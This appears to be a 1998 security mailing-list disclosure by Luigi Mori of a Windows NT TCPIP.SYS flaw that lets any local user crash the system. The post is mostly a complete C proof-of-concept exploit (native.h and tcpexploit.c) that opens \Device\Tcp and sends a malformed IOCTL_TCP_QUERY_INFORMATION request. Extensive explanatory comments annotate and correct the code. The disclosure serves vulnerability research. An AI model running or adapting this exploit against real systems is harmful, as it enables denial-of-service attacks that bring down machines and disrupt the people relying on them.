Crashing NT with Native Calls

From: Luigi Mori (lmat_private)
Date: Wed Sep 23 1998 - 09:16:31 PDT


    Hi,
    While playing with TCPIP.SYS I noticed that any user can crash the
    system simply by calling the undocumented function NtDeviceIoControlFile with
    a handle to the TCP device (\Device\Tcp) and the "right" parameters.
    
    This is the exploit:
    
    --------------- begin native.h --------------------------
    #ifndef gigi_native_h
    #define gigi_native_h
    
    /*
     * Completion record handed to NtDeviceIoControlFile as its IoStatusBlock
     * argument (see tcp_query_information), with the event handle that is
     * passed alongside it tacked on at the end.  The I/O manager is expected to
     * fill the first two fields (final NTSTATUS, bytes transferred); only those
     * two unsigned ints stand in for the IO_STATUS_BLOCK proper.
     * NOTE(review): this matches IO_STATUS_BLOCK only where Information is
     * 32 bits wide; on a 64-bit build Information is a ULONG_PTR and would
     * overlap hevent -- confirm before reusing this layout.
     */
    typedef struct {
            unsigned int    bo;     /* final NTSTATUS of the request */
            unsigned int    result; /* bytes transferred (IOSB.Information) */
            HANDLE                          hevent; /* completion event; not part of the IOSB */
    } nt_overlapped;
    
    /*
     * Control code sent to \Device\Tcp.  0x120003 decodes as
     * CTL_CODE(0x12 = FILE_DEVICE_NETWORK, function 0, method 3 = METHOD_NEITHER,
     * FILE_ANY_ACCESS).  With METHOD_NEITHER the I/O manager passes the raw
     * user-mode buffer pointers and lengths straight to the driver, so TCPIP.SYS
     * itself has to validate them -- presumably why a malformed request from an
     * ordinary user can reach a kernel fault.
     */
    #define IOCTL_TCP_QUERY_INFORMATION     0x120003
    #endif /* gigi_native_h */
    -------------- end native.h ----------------------------
    -------------- begin tcpexploit.c ------------------------
    #include <ntddk.h>
    #include <stdio.h>
    #include <tdiinfo.h>
    #include "native.h"
    
    #define MAX_NAME_LEN    256
    
    /* Process-wide state shared by the helpers below. */
    struct {
            HANDLE  h_tcp;          /* handle to \Device\Tcp; set by open_tcp(), released by close_tcp() */
            char    buff[0x400];    /* 1 KiB output buffer main() hands to the driver */
    } g;
    
    
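    /*
     * Open \Device\Tcp and store the handle in g.h_tcp.
     *
     * Returns 1 on success, 0 on failure (the NTSTATUS is printed and
     * g.h_tcp is left NULL so close_tcp() is a no-op).
     *
     * Desired access 0x20000000 is MAXIMUM_ALLOWED: the object manager grants
     * whatever the device's DACL allows the caller, so the open succeeds for an
     * ordinary user -- no privilege is needed to reach the IOCTL path.
     */
    unsigned int
    open_tcp(void)
    {
            OBJECT_ATTRIBUTES       object_attrs;
            UNICODE_STRING          device_tcp;
            IO_STATUS_BLOCK         io_status_block = {0};
            NTSTATUS                status;

            /* RtlInitUnicodeString points the string at the literal itself;
             * the WCHAR buffer the original declared (and mis-assigned to
             * Buffer just before this call) was never used. */
            RtlInitUnicodeString(&device_tcp, L"\\Device\\Tcp");
            InitializeObjectAttributes(&object_attrs, &device_tcp,
                                       OBJ_CASE_INSENSITIVE, NULL, NULL);

            status = ZwCreateFile(&g.h_tcp,
                                  0x20000000,              /* MAXIMUM_ALLOWED */
                                  &object_attrs,
                                  &io_status_block,
                                  0,                       /* AllocationSize */
                                  FILE_ATTRIBUTE_NORMAL,
                                  FILE_SHARE_READ | FILE_SHARE_WRITE,
                                  FILE_OPEN_IF,
                                  0,                       /* CreateOptions */
                                  NULL, 0);                /* no EA buffer */
            if (status != STATUS_SUCCESS) {
                    /* The original passed the whole IO_STATUS_BLOCK struct
                     * through printf's %#x, which is undefined behaviour;
                     * print the status and the Information field instead. */
                    printf("ZwCreateFile error %#x %#lx\n", (unsigned int)status,
                           (unsigned long)io_status_block.Information);
                    g.h_tcp = NULL;
                    return 0;
            }

            return 1;
    }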
    
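    /*
     * Release the \Device\Tcp handle opened by open_tcp().
     *
     * Safe to call more than once and before open_tcp() succeeded: a NULL
     * handle is skipped, and the handle is cleared after closing so a second
     * call cannot close a handle value the system has since reused.
     */
    void
    close_tcp(void)
    {
            if (g.h_tcp == NULL) {
                    return;
            }
            ZwClose(g.h_tcp);
            g.h_tcp = NULL;
    }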
    
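    /*
     * Issue IOCTL_TCP_QUERY_INFORMATION on g.h_tcp with the given input and
     * output buffers (lengths in bytes).  The request's final NTSTATUS is
     * printed rather than returned -- for this PoC that, or a kernel crash,
     * is the interesting outcome.
     *
     * Returns 0 if the completion event could not be created, 1 once the
     * request has been issued and completed (even if the driver rejected it).
     */
    unsigned int
    tcp_query_information(void *in_buff, unsigned int in_buff_len,
                          void *out_buff, unsigned int out_buff_len)
    {
            NTSTATUS        status;
            nt_overlapped   iosb;   /* passed as the IoStatusBlock; must stay
                                       alive until the request has completed */

            /* 0x1F003 is EVENT_ALL_ACCESS; no object attributes, type 1
             * (synchronization event), initially non-signalled. */
            status = NtCreateEvent(&iosb.hevent, 0x1F003, 0, 1, NULL);
            if (status != STATUS_SUCCESS) {
                    /* The original format string was "0x#x", which never
                     * printed the status; %#x is what was intended. */
                    printf("NtCreateEvent error %#x\n", (unsigned int)status);
                    return 0;
            }

            status = NtDeviceIoControlFile(g.h_tcp, iosb.hevent, 0, 0, &iosb,
                                           IOCTL_TCP_QUERY_INFORMATION,
                                           in_buff, in_buff_len,
                                           out_buff, out_buff_len);

            /*
             * If the driver queued the request, the I/O manager still owns
             * &iosb and out_buff.  The original closed the event and returned
             * at once, leaving a dangling stack IOSB for the completion to
             * write into; wait on the event and take the final status instead.
             * (ZwWaitForSingleObject comes from the same ntdll exports as the
             * other Zw/Nt calls used here.)
             */
            if (status == STATUS_PENDING) {
                    ZwWaitForSingleObject(iosb.hevent, FALSE, NULL);
                    status = (NTSTATUS)iosb.bo;
            }

            ZwClose(iosb.hevent);

            printf("%#X\n", (unsigned int)status);

            return 1;
    }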
    
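    /*
     * Entry point: open \Device\Tcp, send one IOCTL_TCP_QUERY_INFORMATION
     * request with the parameters the author found to fault TCPIP.SYS, and
     * close the handle.  On an affected kernel the machine crashes inside the
     * IOCTL; otherwise the driver's NTSTATUS is printed.
     */
    void    __cdecl
    main(void)
    {
            /* Zero-initialised so the bytes after ID (presumably the Context
             * field from tdiinfo.h) are defined rather than stack garbage; the
             * original left them uninitialised, so the request differed
             * slightly on every run. */
            struct tcp_request_query_information_ex in_buff = {0};

            if (!open_tcp()) {
                    return;
            }

            /* Object id: connection-type, protocol-class info in the
             * connection-oriented transport entity.  0x5 is simply the toi_id
             * the author found to trigger the fault; no other meaning is
             * claimed for it here. */
            in_buff.ID.toi_entity.tei_entity = CO_TL_ENTITY;
            in_buff.ID.toi_entity.tei_instance = 0;
            in_buff.ID.toi_class = INFO_CLASS_PROTOCOL;
            in_buff.ID.toi_type = INFO_TYPE_CONNECTION;
            in_buff.ID.toi_id = 0x5;

            /* The original passed the literal 0x24 as the input length, which
             * is sizeof(in_buff) on the 32-bit headers it was written against;
             * sizeof keeps the length tied to the structure actually sent. */
            tcp_query_information(&in_buff, sizeof(in_buff), g.buff,
                                  sizeof(g.buff));

            /* Always release the device handle, whatever the request did. */
            close_tcp();
    }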
    ----------------- end tcpexploit.c ---------------------------------
    
    Luigi Mori --
    Symbolic (http://www.symbolic.it)
    Now Nuclear Free !!!
    


